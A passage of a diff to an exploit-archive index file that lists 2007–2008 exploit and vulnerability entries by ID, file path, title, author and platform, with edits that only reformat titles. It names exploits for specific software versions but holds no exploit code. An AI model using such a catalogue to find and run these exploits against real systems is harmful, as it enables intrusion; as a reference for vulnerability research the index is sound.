(XMD5) Remote Buffer Overflow Exploit (meta)",2007-02-19,"Jacopo Cervini",windows,remote,21 3336,platforms/php/webapps/3336.txt,"Ultimate Fun Book 1.02 (function.php) Remote File Include Vulnerability",2007-02-20,kezzap66345,php,webapps,0 3337,platforms/php/webapps/3337.php,"NukeSentinel 2.5.05 (nsbypass.php) Blind SQL Injection Exploit",2007-02-20,DarkFig,php,webapps,0 -3338,platforms/php/webapps/3338.php,"NukeSentinel 2.5.05 (nukesentinel.php) File Disclosure Exploit",2007-02-20,DarkFig,php,webapps,0 +3338,platforms/php/webapps/3338.php,"NukeSentinel 2.5.05 - (nukesentinel.php) File Disclosure Exploit",2007-02-20,DarkFig,php,webapps,0 3339,platforms/asp/webapps/3339.txt,"Online Web Building 2.0 (id) Remote SQL Injection Vulnerability",2007-02-20,"Mehmet Ince",asp,webapps,0 3340,platforms/windows/remote/3340.html,"Mozilla Firefox <= 2.0.0.1 (location.hostname) Cross-Domain Vulnerability",2007-02-20,"Michal Zalewski",windows,remote,0 3341,platforms/windows/dos/3341.cpp,"TurboFTP 5.30 Build 572 (newline/LIST) Multiple Remote DoS Exploit",2007-02-20,Marsu,windows,dos,0 @@ -3292,7 +3292,7 @@ id,file,description,date,author,platform,type,port 3632,platforms/php/webapps/3632.pl,"XOOPS Module myAlbum-P <= 2.0 (cid) Remote SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 3633,platforms/php/webapps/3633.htm,"XOOPS Module RM+Soft Gallery 1.0 - Blind SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 3634,platforms/windows/remote/3634.txt,"Microsoft Windows XP/Vista - Animated Cursor (.ANI) Remote Overflow Exploit",2007-04-01,jamikazu,windows,remote,0 -3635,platforms/windows/remote/3635.txt,"Microsoft Windows XP Animated Cursor (.ANI) Remote Overflow Exploit 2",2007-04-01,"Trirat Puttaraksa",windows,remote,0 +3635,platforms/windows/remote/3635.txt,"Microsoft Windows XP - Animated Cursor (.ANI) Remote Overflow Exploit #2",2007-04-01,"Trirat Puttaraksa",windows,remote,0 3636,platforms/windows/remote/3636.txt,"Microsoft Windows - Animated Cursor (.ANI) Remote Exploit (eeye patch bypass)",2007-04-01,jamikazu,windows,remote,0 3638,platforms/php/webapps/3638.txt,"maplab ms4w 2.2.1 - Remote File Inclusion Vulnerability",2007-04-02,ka0x,php,webapps,0 3639,platforms/php/webapps/3639.txt,"PHP-Fusion Module topliste 1.0 (cid) Remote SQL Injection Vulnerability",2007-04-02,"Mehmet Ince",php,webapps,0 @@ -3327,7 +3327,7 @@ id,file,description,date,author,platform,type,port 3670,platforms/php/webapps/3670.txt,"XOOPS Module WF-Links <= 1.03 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0 3671,platforms/php/webapps/3671.php,"phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit",2007-04-05,BlackHawk,php,webapps,0 3672,platforms/php/webapps/3672.pl,"XOOPS Module Jobs <= 2.4 (cid) Remote SQL Injection Exploit",2007-04-05,ajann,php,webapps,0 -3673,platforms/php/webapps/3673.txt,"WebSPELL <= 4.01.02 (picture.php) File Disclosure Vulnerability",2007-04-05,Trex,php,webapps,0 +3673,platforms/php/webapps/3673.txt,"WebSPELL <= 4.01.02 - (picture.php) File Disclosure Vulnerability",2007-04-05,Trex,php,webapps,0 3674,platforms/windows/dos/3674.pl,"Wserve HTTP Server 4.6 (Long Directory Name) Denial of Service Exploit",2007-04-05,WiLdBoY,windows,dos,0 3675,platforms/windows/remote/3675.rb,"FileCOPA FTP Server <= 1.01 (LIST) Remote Buffer Overflow Exploit (2)",2007-04-06,"Umesh Wanve",windows,remote,21 3676,platforms/php/webapps/3676.txt,"Beryo 2.0 (downloadpic.php chemin) Remote File Disclosure Vulnerability",2007-04-06,GoLd_M,php,webapps,0 @@ -3382,7 +3382,7 @@ id,file,description,date,author,platform,type,port 3727,platforms/windows/local/3727.c,"VCDGear <= 3.56 Build 050213 (FILE) Local Code Execution Exploit",2007-04-13,InTeL,windows,local,0 3728,platforms/windows/remote/3728.c,"Internet Explorer NCTAudioFile2.AudioFile ActiveX Remote Overflow Exploit",2007-04-13,InTeL,windows,remote,0 3729,platforms/php/webapps/3729.txt,"qdblog 0.4 (SQL Injection/lfi) Multiple Vulnerabilities",2007-04-13,Omni,php,webapps,0 -3730,platforms/linux/local/3730.txt,"ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield)",2007-04-13,Xpl017Elz,linux,local,0 +3730,platforms/linux/local/3730.txt,"ProFTPD 1.3.0/1.3.0a - (mod_ctrls) Local Overflow Exploit (exec-shield)",2007-04-13,Xpl017Elz,linux,local,0 3731,platforms/php/webapps/3731.php,"Frogss CMS <= 0.7 - Remote SQL Injection Exploit",2007-04-13,Kacper,php,webapps,0 3732,platforms/php/webapps/3732.txt,"Garennes 0.6.1 (repertoire_config) Remote File Inclusion Vulnerabilities",2007-04-13,GoLd_M,php,webapps,0 3733,platforms/php/webapps/3733.txt,"Pixaria Gallery 1.x - (class.Smarty.php) Remote File Include Vulnerability",2007-04-14,irvian,php,webapps,0 @@ -3398,7 +3398,7 @@ id,file,description,date,author,platform,type,port 3743,platforms/php/webapps/3743.txt,"Gallery 1.2.5 (GALLERY_BASEDIR) Multiple RFI Vulnerabilities",2007-04-15,GoLd_M,php,webapps,0 3744,platforms/php/webapps/3744.txt,"audioCMS arash 0.1.4 (arashlib_dir) Remote File Inclusion Vulnerabilities",2007-04-15,GoLd_M,php,webapps,0 3745,platforms/php/webapps/3745.txt,"Web Slider 0.6 (path) Remote File Inclusion Vulnerabilities",2007-04-15,GoLd_M,php,webapps,0 -3746,platforms/windows/remote/3746.txt,"Microsoft Windows DNS RPC - Remote Buffer Overflow Exploit (port 445) (2)",2007-04-18,"Andres Tarasco",windows,remote,445 +3746,platforms/windows/remote/3746.txt,"Microsoft Windows DNS RPC - Remote Buffer Overflow Exploit #2",2007-04-18,"Andres Tarasco",windows,remote,445 3747,platforms/php/webapps/3747.txt,"openMairie 1.10 (scr/soustab.php) Local File Inclusion Vulnerability",2007-04-16,GoLd_M,php,webapps,0 3748,platforms/php/webapps/3748.txt,"SunShop Shopping Cart <= 3.5 (abs_path) RFI Vulnerabilities",2007-04-16,irvian,php,webapps,0 3749,platforms/php/webapps/3749.txt,"StoreFront for Gallery (GALLERY_BASEDIR) RFI Vulnerabilities",2007-04-16,"Alkomandoz Hacker",php,webapps,0 @@ -3483,7 +3483,7 @@ id,file,description,date,author,platform,type,port 3828,platforms/php/webapps/3828.txt,"Wordpress plugin myflash <= 1.00 (wppath) RFI Vulnerability",2007-05-01,Crackers_Child,php,webapps,0 3829,platforms/linux/remote/3829.c,"3proxy 0.5.3g proxy.c logurl() Remote Overflow Exploit (exec-shield)",2007-05-02,Xpl017Elz,linux,remote,0 3830,platforms/windows/dos/3830.html,"Excel Viewer OCX 3.1.0.6 - Multiple Methods Denial of Service Exploit",2007-05-02,shinnai,windows,dos,0 -3831,platforms/asp/webapps/3831.txt,"PStruh-CZ 1.3/1.5 (download.asp File) File Disclosure Vulnerability",2007-05-02,Dj7xpl,asp,webapps,0 +3831,platforms/asp/webapps/3831.txt,"PStruh-CZ 1.3/1.5 - (download.asp File) File Disclosure Vulnerability",2007-05-02,Dj7xpl,asp,webapps,0 3832,platforms/php/webapps/3832.txt,"1024 CMS 0.7 (download.php item) Remote File Disclosure Vulnerability",2007-05-02,Dj7xpl,php,webapps,0 3833,platforms/php/webapps/3833.pl,"mxBB Module FAQ & RULES 2.0.0 - Remote File Inclusion Exploit",2007-05-02,bd0rk,php,webapps,0 3834,platforms/php/webapps/3834.php,"YaPIG 0.95b Remote Code Execution Exploit",2007-05-02,Dj7xpl,php,webapps,0 @@ -3635,7 +3635,7 @@ id,file,description,date,author,platform,type,port 3982,platforms/windows/remote/3982.html,"Dart Communications PowerTCP Service Control Remote BoF Exploit",2007-05-24,rgod,windows,remote,0 3983,platforms/php/webapps/3983.txt,"FirmWorX 0.1.2 - Multiple Remote File Inclusion Vulnerabilities",2007-05-24,DeltahackingTEAM,php,webapps,0 3984,platforms/windows/remote/3984.html,"Dart Communications PowerTCP ZIP Compression Remote BoF Exploit",2007-05-25,rgod,windows,remote,0 -3985,platforms/osx/local/3985.txt,"Mac OS X <= 10.4.8 pppd Plugin Loading Privilege Escalation Exploit",2007-05-25,qaaz,osx,local,0 +3985,platforms/osx/local/3985.txt,"Mac OS X <= 10.4.8 - pppd Plugin Loading Privilege Escalation Exploit",2007-05-25,qaaz,osx,local,0 3986,platforms/windows/dos/3986.html,"LeadTools Raster Dialog File_D Object Remote Buffer Overflow Exploit",2007-05-25,shinnai,windows,dos,0 3987,platforms/php/webapps/3987.txt,"Webavis 0.1.1 (class.php root) Remote File Inclusion Vulnerability",2007-05-25,"ThE TiGeR",php,webapps,0 3988,platforms/php/webapps/3988.php,"gCards <= 1.46 SQL Injection/Remote Code Execution Exploit",2007-05-25,Silentz,php,webapps,0 @@ -3750,7 +3750,7 @@ id,file,description,date,author,platform,type,port 4102,platforms/php/webapps/4102.txt,"b1gbb 2.24.0 (footer.inc.php tfooter) Remote File Inclusion Vulnerability",2007-06-25,Rf7awy,php,webapps,0 4103,platforms/php/webapps/4103.txt,"bugmall shopping cart 2.5 (sql/XSS) Multiple Vulnerabilities",2007-06-25,t0pP8uZz,php,webapps,0 4104,platforms/php/webapps/4104.txt,"6ALBlog (newsid) Remote SQL Injection Vulnerability",2007-06-25,Crackers_Child,php,webapps,0 -4105,platforms/php/webapps/4105.txt,"SiteDepth CMS 3.44 (ShowImage.php name) File Disclosure Vulnerability",2007-06-25,"H4 / XPK",php,webapps,0 +4105,platforms/php/webapps/4105.txt,"SiteDepth CMS 3.44 - (ShowImage.php name) File Disclosure Vulnerability",2007-06-25,"H4 / XPK",php,webapps,0 4106,platforms/php/webapps/4106.php,"DreamLog 0.5 (upload.php) Arbitrary File Upload Exploit",2007-06-25,Dj7xpl,php,webapps,0 4107,platforms/php/webapps/4107.txt,"Pagetool 1.07 (news_id) Remote SQL Injection Vulnerability",2007-06-25,Katatafish,php,webapps,0 4108,platforms/php/webapps/4108.txt,"eDocStore (doc.php doc_id) Remote SQL Injection Vulnerability",2007-06-25,t0pP8uZz,php,webapps,0 @@ -3765,7 +3765,7 @@ id,file,description,date,author,platform,type,port 4118,platforms/windows/dos/4118.html,"RealNetworks RealPlayer/HelixPlayer SMIL wallclock Stack Overflow PoC",2007-06-27,axis,windows,dos,0 4119,platforms/windows/remote/4119.html,"HP Digital Imaging (hpqxml.dll 2.0.0.133) Arbitary Data Write Exploit",2007-06-27,callAX,windows,remote,0 4120,platforms/windows/dos/4120.html,"Sony Network Camera SNC-P5 1.0 - ActiveX viewer Heap Overflow PoC",2007-06-27,str0ke,windows,dos,0 -4121,platforms/windows/dos/4121.txt,"Microsoft Excel 2000/2003 Sheet Name Vulnerability PoC",2007-06-27,ZhenHan.Liu,windows,dos,0 +4121,platforms/windows/dos/4121.txt,"Microsoft Excel 2000/2003 - Sheet Name Vulnerability PoC",2007-06-27,ZhenHan.Liu,windows,dos,0 4122,platforms/php/webapps/4122.txt,"b1gbb 2.24.0 (SQL Injection / XSS) Remote Vulnerabilities",2007-06-28,GoLd_M,php,webapps,0 4123,platforms/windows/remote/4123.html,"AMX Corp. VNC ActiveX Control (AmxVnc.dll 1.0.13.0) BoF Exploit",2007-06-28,rgod,windows,remote,0 4124,platforms/php/webapps/4124.txt,"GL-SH Deaf Forum <= 6.4.4 - Local File Inclusion Vulnerabilities",2007-06-28,Katatafish,php,webapps,0 @@ -3822,7 +3822,7 @@ id,file,description,date,author,platform,type,port 4175,platforms/multiple/dos/4175.php,"PHP 5.2.3 bz2 com_print_typeinfo() Denial of Service Exploit",2007-07-12,shinnai,multiple,dos,0 4176,platforms/windows/remote/4176.html,"SecureBlackbox (PGPBBox.dll 5.1.0.112) Arbitary Data Write Exploit",2007-07-12,callAX,windows,remote,0 4177,platforms/windows/remote/4177.html,"Program Checker (sasatl.dll 1.5.0.531) DebugMsgLog Heap Spraying Exploit",2007-07-12,callAX,windows,remote,0 -4178,platforms/windows/local/4178.txt,"Symantec AntiVirus symtdi.sys Local Privilege Escalation Exploit",2007-07-12,"Zohiartze Herce",windows,local,0 +4178,platforms/windows/local/4178.txt,"Symantec AntiVirus - symtdi.sys Local Privilege Escalation Exploit",2007-07-12,"Zohiartze Herce",windows,local,0 4179,platforms/php/webapps/4179.php,"MkPortal <= 1.1.1 reviews / gallery modules SQL Injection Exploit",2007-07-12,Coloss,php,webapps,0 4180,platforms/php/webapps/4180.txt,"MKPortal NoBoard Module (BETA) Remote File Inclusion Vulnerability",2007-07-14,g00ns,php,webapps,0 4181,platforms/multiple/dos/4181.php,"PHP 5.2.3 glob() Denial of Service Exploit",2007-07-14,shinnai,multiple,dos,0 @@ -3832,7 +3832,7 @@ id,file,description,date,author,platform,type,port 4185,platforms/php/webapps/4185.txt,"Prozilla Directory Script - (directory.php cat_id) SQL Injection Vulnerbility",2007-07-14,t0pP8uZz,php,webapps,0 4186,platforms/php/webapps/4186.txt,"paFileDB 3.6 (search.php) Remote SQL Injection Vulnerability",2007-07-14,pUm,php,webapps,0 4187,platforms/php/webapps/4187.txt,"Traffic Stats (referralUrl.php offset) Remote SQL Injection Vulnerbility",2007-07-16,t0pP8uZz,php,webapps,0 -4188,platforms/windows/remote/4188.txt,"Flash Player/Plugin Video file parsing Remote Code Execution PoC",2007-07-16,yunshu,windows,remote,0 +4188,platforms/windows/remote/4188.txt,"Flash Player/Plugin Video - File Parsing Remote Code Execution PoC",2007-07-16,yunshu,windows,remote,0 4189,platforms/php/webapps/4189.txt,"Expert Advisior (index.php id) Remote SQL Injection Vulnerbility",2007-07-17,t0pP8uZz,php,webapps,0 4190,platforms/windows/remote/4190.html,"Data Dynamics ActiveBar ActiveX (actbar3.ocx <= 3.1) Insecure Methods",2007-07-17,shinnai,windows,remote,0 4191,platforms/php/webapps/4191.txt,"Pictures Rating (index.php msgid) Remote SQL Injection Vulnerbility",2007-07-18,t0pP8uZz,php,webapps,0 @@ -3950,7 +3950,7 @@ id,file,description,date,author,platform,type,port 4304,platforms/windows/dos/4304.php,"PHP 5.2.3 php_ntuser ntuser_getuserlist() Local Buffer Overflow PoC",2007-08-23,shinnai,windows,dos,0 4305,platforms/php/webapps/4305.txt,"Joomla Component NeoRecruit <= 1.4 (id) SQL Injection Vulnerability",2007-08-23,ajann,php,webapps,0 4306,platforms/php/webapps/4306.txt,"Mambo Component RemoSitory (cat) Remote SQL Injection Vulnerability",2007-08-23,ajann,php,webapps,0 -4307,platforms/php/webapps/4307.txt,"Joomla Component RSfiles <= 1.0.2 (path) File Download Vulnerability",2007-08-23,ajann,php,webapps,0 +4307,platforms/php/webapps/4307.txt,"Joomla Component RSfiles <= 1.0.2 - (path) File Download Vulnerability",2007-08-23,ajann,php,webapps,0 4308,platforms/php/webapps/4308.txt,"Joomla Component Nice Talk <= 0.9.3 (tagid) SQL Injection Vulnerability",2007-08-23,ajann,php,webapps,0 4309,platforms/php/webapps/4309.txt,"Joomla Component EventList <= 0.8 (did) SQL Injection Vulnerability",2007-08-23,ajann,php,webapps,0 4310,platforms/php/webapps/4310.txt,"Joomla Component BibTeX <= 1.3 - Remote Blind SQL Injection Exploit",2007-08-23,ajann,php,webapps,0 @@ -3977,8 +3977,8 @@ id,file,description,date,author,platform,type,port 4331,platforms/php/webapps/4331.pl,"DL PayCart 1.01 (viewitem.php ItemID) Blind SQL Injection Exploit",2007-08-28,irvian,php,webapps,0 4332,platforms/php/webapps/4332.txt,"VWar <= 1.5.0 R15 - (mvcw.php) Remote File Inclusion Vulnerability",2007-08-28,DNX,php,webapps,0 4333,platforms/php/webapps/4333.txt,"PHPNuke-Clan <= 4.2.0 - (mvcw_conver.php) RFI Vulnerability",2007-08-28,DNX,php,webapps,0 -4334,platforms/windows/remote/4334.txt,"MSN messenger 7.x (8.0?) VIDEO Remote Heap Overflow Exploit",2007-08-29,wushi,windows,remote,0 -4335,platforms/windows/dos/4335.txt,"Yahoo! Messenger 8.1.0.413 (webcam) Remote Crash Exploit",2007-08-29,wushi,windows,dos,0 +4334,platforms/windows/remote/4334.txt,"MSN messenger 7.x (8.0?) - Video Remote Heap Overflow Exploit",2007-08-29,wushi,windows,remote,0 +4335,platforms/windows/dos/4335.txt,"Yahoo! Messenger 8.1.0.413 - (webcam) Remote Crash Exploit",2007-08-29,wushi,windows,dos,0 4336,platforms/php/webapps/4336.txt,"xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability",2007-08-29,DarkFuneral,php,webapps,0 4337,platforms/windows/dos/4337.c,"Microsoft Windows - (GDI32.DLL) Denial of Service Exploit (MS07-046)",2007-08-29,"Gil-Dong / Woo-Chi",windows,dos,0 4338,platforms/php/webapps/4338.pl,"ABC estore 3.0 (cat_id) Remote Blind SQL Injection Exploit",2007-08-29,k1tk4t,php,webapps,0 @@ -4018,7 +4018,7 @@ id,file,description,date,author,platform,type,port 4372,platforms/windows/remote/4372.html,"GlobalLink 2.7.0.8 glitemflat.dll SetClientInfo() Heap Overflow Exploit",2007-09-07,void,windows,remote,0 4373,platforms/windows/dos/4373.html,"EDraw Office Viewer Component 5.2 - ActiveX Remote BoF PoC",2007-09-07,shinnai,windows,dos,0 4374,platforms/php/webapps/4374.txt,"Online Fantasy Football League (OFFL) 0.2.6 RFI Vulnerabilities",2007-09-07,MhZ91,php,webapps,0 -4375,platforms/windows/dos/4375.txt,"BaoFeng2 Mps.dll ActiveX Multiple Remote Buffer Overflow PoCs",2007-09-08,ZhenHan.Liu,windows,dos,0 +4375,platforms/windows/dos/4375.txt,"BaoFeng2 - Mps.dll ActiveX Multiple Remote Buffer Overflow PoCs",2007-09-08,ZhenHan.Liu,windows,dos,0 4376,platforms/php/webapps/4376.txt,"TLM CMS 3.2 - Multiple Remote SQL Injection Vulnerabilities",2007-09-08,k1tk4t,php,webapps,0 4377,platforms/php/webapps/4377.txt,"Focus/SIS <= 1.0/2.2 - Remote File Inclusion Vulnerabilities",2007-09-08,"ThE TiGeR",php,webapps,0 4378,platforms/php/webapps/4378.htm,"fuzzylime CMS <= 3.0 - Local File Inclusion Vulnerability",2007-09-08,"not sec group",php,webapps,0 @@ -4037,7 +4037,7 @@ id,file,description,date,author,platform,type,port 4391,platforms/multiple/remote/4391.c,"Lighttpd <= 1.4.16 FastCGI Header Overflow Remote Exploit",2007-09-10,"Mattias Bengtsson",multiple,remote,0 4392,platforms/multiple/local/4392.txt,"PHP <= 4.4.7 / 5.2.3 MySQL/MySQLi Safe Mode Bypass Vulnerability",2007-09-10,"Mattias Bengtsson",multiple,local,0 4393,platforms/windows/remote/4393.html,"Microsoft Visual Studio 6.0 (PDWizard.ocx) Remote Command Execution",2007-09-11,shinnai,windows,remote,0 -4394,platforms/windows/remote/4394.html,"Microsoft Visual Studio 6.0 (VBTOVSI.DLL 1.0.0.0) File Overwrite Exploit",2007-09-11,shinnai,windows,remote,0 +4394,platforms/windows/remote/4394.html,"Microsoft Visual Studio 6.0 - (VBTOVSI.DLL 1.0.0.0) File Overwrite Exploit",2007-09-11,shinnai,windows,remote,0 4395,platforms/php/webapps/4395.txt,"NuclearBB Alpha 2 (root_path) Remote File Inclusion Vulnerability",2007-09-11,"Rootshell Security",php,webapps,0 4396,platforms/php/webapps/4396.txt,"X-Cart <= ? Multiple Remote File Inclusion Vulnerabilities",2007-09-11,aLiiF,php,webapps,0 4397,platforms/php/webapps/4397.rb,"Wordpress Multiple Versions Pwnpress Exploitation Tookit (0.2pub)",2007-09-14,"Lance M. Havok",php,webapps,0 @@ -4242,7 +4242,7 @@ id,file,description,date,author,platform,type,port 4598,platforms/windows/remote/4598.html,"EDraw Flowchart ActiveX Control 2.0 Insecure Method Exploit",2007-11-02,shinnai,windows,remote,0 4599,platforms/php/webapps/4599.txt,"Ax Developer CMS 0.1.1 - (index.php module) Local File Inclusion Vuln",2007-11-02,GoLd_M,php,webapps,0 4600,platforms/linux/dos/4600.py,"Firefly Media Server <= 0.2.4 - Remote Denial of Service Exploit",2007-11-02,nnp,linux,dos,0 -4601,platforms/multiple/dos/4601.txt,"Ubuntu 6.06 DHCPd bug Remote Denial of Service Exploit",2007-11-02,RoMaNSoFt,multiple,dos,0 +4601,platforms/multiple/dos/4601.txt,"Ubuntu 6.06 DHCPd - Remote Denial of Service Exploit",2007-11-02,RoMaNSoFt,multiple,dos,0 4602,platforms/php/webapps/4602.txt,"GuppY 4.6.3 (includes.inc selskin) Remote File Inclusion Vulnerability",2007-11-03,irk4z,php,webapps,0 4603,platforms/php/webapps/4603.txt,"Quick and Dirty Blog 0.4 (categories.php) Local File Inclusion Vuln",2007-11-03,GoLd_M,php,webapps,0 4604,platforms/php/webapps/4604.txt,"scWiki 1.0 Beta 2 (common.php pathdot) Remote File Inclusion Vuln",2007-11-03,GoLd_M,php,webapps,0 @@ -4266,7 +4266,7 @@ id,file,description,date,author,platform,type,port 4622,platforms/php/webapps/4622.txt,"Myspace Clone Script Remote SQL Injection Vulnerability",2007-11-13,t0pP8uZz,php,webapps,0 4623,platforms/php/webapps/4623.txt,"Toko Instan 7.6 - Multiple Remote SQL Injection Vulnerabilities",2007-11-14,k1tk4t,php,webapps,0 4624,platforms/osx/dos/4624.c,"Apple Mac OS X 10.4.x Kernel i386_set_ldt() Integer Overflow PoC",2007-11-16,"RISE Security",osx,dos,0 -4625,platforms/windows/local/4625.txt,"Microsoft Jet Engine MDB File Parsing Stack Overflow PoC",2007-11-16,cocoruder,windows,local,0 +4625,platforms/windows/local/4625.txt,"Microsoft Jet Engine - .MDB File Parsing Stack Overflow PoC",2007-11-16,cocoruder,windows,local,0 4626,platforms/php/webapps/4626.txt,"Joomla Component Carousel Flash Image Gallery RFI Vulnerability",2007-11-16,Crackers_Child,php,webapps,0 4627,platforms/php/webapps/4627.txt,"ProfileCMS <= 1.0 (id) Remote SQL Injection Vulnerability",2007-11-16,K-159,php,webapps,0 4628,platforms/php/webapps/4628.txt,"Myspace Clone Script (index.php) Remote File Inclusion Vulnerability",2007-11-16,VerY-SecReT,php,webapps,0 @@ -4305,7 +4305,7 @@ id,file,description,date,author,platform,type,port 4661,platforms/php/webapps/4661.py,"DeluxeBB <= 1.09 - Remote Admin Email Change Exploit",2007-11-26,nexen,php,webapps,0 4662,platforms/php/webapps/4662.txt,"Tilde CMS <= 4.x - (aarstal) Remote SQL Injection Vulnerability",2007-11-26,KiNgOfThEwOrLd,php,webapps,0 4663,platforms/windows/remote/4663.html,"BitDefender Online Scanner 8 - ActiveX Heap Overflow Exploit",2007-11-27,Nphinity,windows,remote,0 -4664,platforms/windows/remote/4664.txt,"Apple QuickTime 7.2/7.3 RSTP Response Universal Exploit (cool)",2007-11-27,"YAG KOHHA",windows,remote,0 +4664,platforms/windows/remote/4664.txt,"Apple QuickTime 7.2/7.3 - RSTP Response Universal Exploit",2007-11-27,"YAG KOHHA",windows,remote,0 4665,platforms/php/webapps/4665.txt,"Eurologon CMS - Multiple Remote SQL Injection Vulnerabilities",2007-11-27,KiNgOfThEwOrLd,php,webapps,0 4666,platforms/php/webapps/4666.txt,"Eurologon CMS files.php Arbitrary File Download Vulnerability",2007-11-27,KiNgOfThEwOrLd,php,webapps,0 4667,platforms/php/webapps/4667.txt,"PHP-Nuke NSN Script Depository 1.0.0 - Remote Source Disclosure Vuln",2007-11-27,KiNgOfThEwOrLd,php,webapps,0 @@ -4345,7 +4345,7 @@ id,file,description,date,author,platform,type,port 4701,platforms/windows/local/4701.pl,"Media Player Classic 6.4.9 MP4 File Stack Overflow Exploit",2007-12-08,"SYS 49152",windows,local,0 4702,platforms/windows/local/4702.pl,"Windows Media Player 6.4 MP4 File Stack Overflow PoC",2007-12-08,"SYS 49152",windows,local,0 4703,platforms/windows/local/4703.pl,"Nullsoft Winamp 5.32 MP4 tags Stack Overflow Exploit",2007-12-08,"SYS 49152",windows,local,0 -4704,platforms/php/webapps/4704.txt,"PolDoc CMS 0.96 (download_file.php) File Disclosure Vulnerability",2007-12-08,GoLd_M,php,webapps,0 +4704,platforms/php/webapps/4704.txt,"PolDoc CMS 0.96 - (download_file.php) File Disclosure Vulnerability",2007-12-08,GoLd_M,php,webapps,0 4705,platforms/php/webapps/4705.txt,"Flat PHP Board <= 1.2 - Multiple Vulnerabilities",2007-12-09,KiNgOfThEwOrLd,php,webapps,0 4706,platforms/php/webapps/4706.txt,"Content Injector 1.53 (index.php) Remote SQL Injection Vulnerability",2007-12-09,S.W.A.T.,php,webapps,0 4707,platforms/php/webapps/4707.txt,"Ace Image Hosting Script (id) Remote SQL Injection Vulnerability",2007-12-09,t0pP8uZz,php,webapps,0 @@ -4515,7 +4515,7 @@ id,file,description,date,author,platform,type,port 4873,platforms/windows/remote/4873.html,"Microsoft FoxServer (vfp6r.dll 6.0.8862.0) ActiveX Command Execution",2008-01-09,shinnai,windows,remote,0 4874,platforms/windows/remote/4874.html,"Microsoft Rich Textbox Control 6.0 (SP6) SaveFile() Insecure Method",2008-01-09,shinnai,windows,remote,0 4876,platforms/php/webapps/4876.txt,"Tuned Studios Templates Local File Inclusion Vulnerability",2008-01-09,DSecRG,php,webapps,0 -4877,platforms/multiple/remote/4877.txt,"SAP MaxDB <= 7.6.03.07 pre-auth Remote Command Execution Exploit",2008-01-09,"Luigi Auriemma",multiple,remote,7210 +4877,platforms/multiple/remote/4877.txt,"SAP MaxDB <= 7.6.03.07 - pre-auth Remote Command Execution Exploit",2008-01-09,"Luigi Auriemma",multiple,remote,7210 4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server - Remote pre-auth Code Execution / DoS PoC",2008-01-09,"Leon Juranic",multiple,dos,0 4879,platforms/php/webapps/4879.php,"Docebo <= 3.5.0.3 (lib.regset.php) Command Execution Exploit",2008-01-09,EgiX,php,webapps,0 4880,platforms/php/webapps/4880.php,"DomPHP <= 0.81 - Remote Add Administrator Exploit",2008-01-10,j0j0,php,webapps,0 @@ -4544,7 +4544,7 @@ id,file,description,date,author,platform,type,port 4903,platforms/windows/remote/4903.html,"NUVICO DVR NVDV4 / PdvrAtl Module (PdvrAtl.DLL 1.0.1.25) - BoF Exploit",2008-01-13,rgod,windows,remote,0 4904,platforms/php/webapps/4904.txt,"Binn SBuilder (nid) Remote Blind SQL Injection Vulnerability",2008-01-13,JosS,php,webapps,0 4905,platforms/php/webapps/4905.pl,"Agares PhpAutoVideo 2.21 (articlecat) Remote SQL Injection Exploit",2008-01-13,Pr0metheuS,php,webapps,0 -4906,platforms/windows/remote/4906.txt,"Quicktime Player 7.3.1.70 rtsp Remote Buffer Overflow Exploit PoC",2008-01-14,"Luigi Auriemma",windows,remote,0 +4906,platforms/windows/remote/4906.txt,"Quicktime Player 7.3.1.70 - rtsp Remote Buffer Overflow Exploit PoC",2008-01-14,"Luigi Auriemma",windows,remote,0 4907,platforms/php/webapps/4907.py,"X7 Chat <= 2.0.5 (day) Remote SQL Injection Exploit",2008-01-14,nonroot,php,webapps,0 4908,platforms/php/webapps/4908.pl,"Xforum 1.4 (topic) Remote SQL Injection Exploit",2008-01-14,j0j0,php,webapps,0 4909,platforms/windows/remote/4909.html,"Macrovision FlexNet DownloadManager Insecure Methods Exploit",2008-01-14,Elazar,windows,remote,0 @@ -4591,8 +4591,8 @@ id,file,description,date,author,platform,type,port 4950,platforms/php/webapps/4950.php,"Coppermine Photo Gallery 1.4.10 - Remote SQL Injection Exploit",2008-01-21,bazik,php,webapps,0 4951,platforms/php/webapps/4951.txt,"Mooseguy Blog System 1.0 (blog.php month) SQL Injection Vulnerability",2008-01-21,The_HuliGun,php,webapps,0 4952,platforms/php/webapps/4952.txt,"boastMachine <= 3.1 (mail.php id) SQL Injection Vulnerability",2008-01-21,"Virangar Security",php,webapps,0 -4953,platforms/php/webapps/4953.txt,"OZJournals 2.1.1 (id) File Disclosure Vulnerability",2008-01-21,shinmai,php,webapps,0 -4954,platforms/php/webapps/4954.txt,"IDM-OS 1.0 (download.php fileName) File Disclosure Vulnerability",2008-01-21,MhZ91,php,webapps,0 +4953,platforms/php/webapps/4953.txt,"OZJournals 2.1.1 - (id) File Disclosure Vulnerability",2008-01-21,shinmai,php,webapps,0 +4954,platforms/php/webapps/4954.txt,"IDM-OS 1.0 - (download.php fileName) File Disclosure Vulnerability",2008-01-21,MhZ91,php,webapps,0 4955,platforms/php/webapps/4955.txt,"Lama Software (14.12.2007) Multiple Remote File Inclusion Vulnerabilities",2008-01-21,QTRinux,php,webapps,0 4956,platforms/php/webapps/4956.txt,"AlstraSoft Forum Pay Per Post Exchange 2.0 - SQL Injection Vulnerability",2008-01-21,t0pP8uZz,php,webapps,0 4957,platforms/php/webapps/4957.txt,"MoinMoin 1.5.x MOIND_ID cookie Bug Remote Exploit",2008-01-21,nonroot,php,webapps,0 @@ -4847,7 +4847,7 @@ id,file,description,date,author,platform,type,port 5210,platforms/linux/dos/5210.c,"Galaxy FTP Server 1.0 (Neostrada Livebox DSL Router) DoS Exploit",2008-03-01,0in,linux,dos,0 5211,platforms/php/webapps/5211.txt,"Dynamic photo gallery 1.02 (albumID) Remote SQL Injection Vulnerability",2008-03-01,"Aria-Security Team",php,webapps,0 5212,platforms/windows/remote/5212.py,"MiniWebSvr 0.0.9a Remote Directory Transversal Vulnerability",2008-03-03,gbr,windows,remote,0 -5213,platforms/windows/remote/5213.txt,"Versant Object Database <= 7.0.1.3 Commands Execution Exploit",2008-03-04,"Luigi Auriemma",windows,remote,0 +5213,platforms/windows/remote/5213.txt,"Versant Object Database <= 7.0.1.3 - Commands Execution Exploit",2008-03-04,"Luigi Auriemma",windows,remote,0 